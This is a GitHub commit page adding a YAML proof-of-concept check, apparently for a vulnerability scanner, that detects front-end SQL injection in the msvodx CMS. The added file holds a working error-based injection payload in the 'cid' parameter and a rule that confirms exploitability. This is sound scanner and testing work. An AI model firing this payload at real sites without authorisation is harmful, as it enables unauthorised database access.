Skip to content

Commit

Permalink
msvodx 前台注入 (#636)
Browse files Browse the repository at this point in the history
  • Loading branch information
jinqi520 authored and virusdefender committed Jan 6, 2020
1 parent 71f6ca5 commit a7438bc
Showing 1 changed file with 12 additions and 0 deletions.
12 changes: 12 additions & 0 deletions pocs/msvod-sqli.yml
Original file line number Diff line number Diff line change
@@ -0,0 +1,12 @@
name: poc-yaml-msvod-sqli
set:
r1: randomInt(800000000, 1000000000)
rules:
- method: GET
path: "/images/lists?cid=1 ) ORDER BY 1 desc,extractvalue(rand(),concat(0x7c,md5({{r1}}))) desc --+a"
expression: |
response.body.bcontains(bytes(substr(md5(string(r1)), 0, 31)))
detail:
author: jinqi
links:
- https://github.com/jinqi520

0 comments on commit a7438bc

Please sign in to comment.